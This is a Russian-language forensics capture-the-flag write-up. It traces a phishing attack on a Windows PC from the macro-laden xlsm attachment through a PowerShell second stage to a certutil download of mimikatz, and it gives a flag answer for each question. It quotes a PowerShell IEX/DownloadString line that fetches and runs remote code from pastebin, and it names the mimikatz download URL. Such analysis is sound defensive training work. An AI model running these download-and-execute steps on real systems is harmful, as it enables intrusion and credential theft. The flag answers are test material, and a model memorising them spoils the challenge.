## Q1) Укажите версию установленного Microsoft Office

1) Проверили файл `C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE`.
2) Из PE‑ресурса `FileVersion/ProductVersion` получил версию.

Итог: `caplag{12.0.4518.1014}`

## Q2) Определите начальный вектор атаки. Укажите почту, откуда пришел вирусный файл и название файла (с расширением). формат: email_filename

1) В профиле Thunderbird открыли письмо: `C:\Users\PC31\AppData\Roaming\thunderbird\Profiles\g59pkejj.default-release\Mail\Local Folders\mail.eml`.
2) В заголовках письма: `From: "HR Department" <hr@gdhwiXzuedhi.org>`.
3) Во вложениях письма: `filename="shtatnoe-raspisanie.xlsm"`.

Итог: `caplag{hr@gdhwiXzuedhi.org_shtatnoe-raspisanie.xlsm}`

## Q3) Укажите ссылку, которая использовалась для загрузки и запуска второй стадии атаки

1) Открыли `C:\Users\PC31\Documents\shtatnoe-raspisanie.xlsm`.
2) `olevba` показал `Workbook_Open`, где строка дважды декодируется из base64.
3) После декодирования получен URL: `https://pastebin.com/raw/hz2rEByR`, который передается в `powershell.exe -c IEX (New-Object Net.WebClient).DownloadString(...)`.

Итог: `caplag{https://pastebin.com/raw/hz2rEByR}`

## Q4) Через Reverse shell хакер скачал еще один вредоносный файл для третей стадии атаки. Укажите URL

1) Открыли кеш загрузок CryptoAPI: `C:\Users\PC31\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5E417CD142DEC44E17C581F01DB81204`.
2) Внутри файла в UTF‑16LE хранится полный URL загрузки архива.

Итог: `caplag{https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip}`

## Q5) Укажите полный путь к архиву где лежит mimikatz и название программы (c расширением) с помощью которой хакер скачал его. формат: Path_filename

1) В `C:\Windows\Prefetch\CERTUTIL.EXE-79A712E5.pf` (после распаковки MAM/LZXPRESS‑Huffman) в списке ссылок указаны файлы:
   - `C:\Users\PC31\AppData\Local\Temp\.settings.zip`
   - `C:\Windows\SysWOW64\certutil.exe`
2) Это подтверждает, что архив с mimikatz сохранен как `.settings.zip`, а скачивание выполнено `certutil.exe`.

Итог: `caplag{C:\Users\PC31\AppData\Local\Temp\.settings.zip_certutil.exe}`

## Q6) Укажите полную дату последнего запуска certutil.exe и кол-во запусков этой программы. формат: дд.мм.гггг/чч:мм:cc_count.

1) В `C:\Windows\Prefetch\CERTUTIL.EXE-79A712E5.pf` распаковали MAM‑блок (LZXPRESS‑Huffman).
2) В распакованном файле:
   - `last_run_time` (FILETIME) находится по смещению `0x80` → `2025‑06‑30 12:18:36Z` (UTC).
   - `run_count` (DWORD) по смещению `0xC8` → `1`.
3) Перевод в локальное время (UTC+3) дает `30.06.2025 15:18:36`.

Итог: `caplag{30.06.2025/15:18:36_1}`

## Q7) Укажите сайт который пользователь посетил больше всего

1) История браузера пользователя находится в Edge: `C:\Users\PC31\AppData\Local\Microsoft\Edge\User Data\Default\History`.
2) В SQLite‑таблице `urls` максимальный `visit_count` у страниц домена `unisender.com`.

Итог: `caplag{https://www.unisender.com}`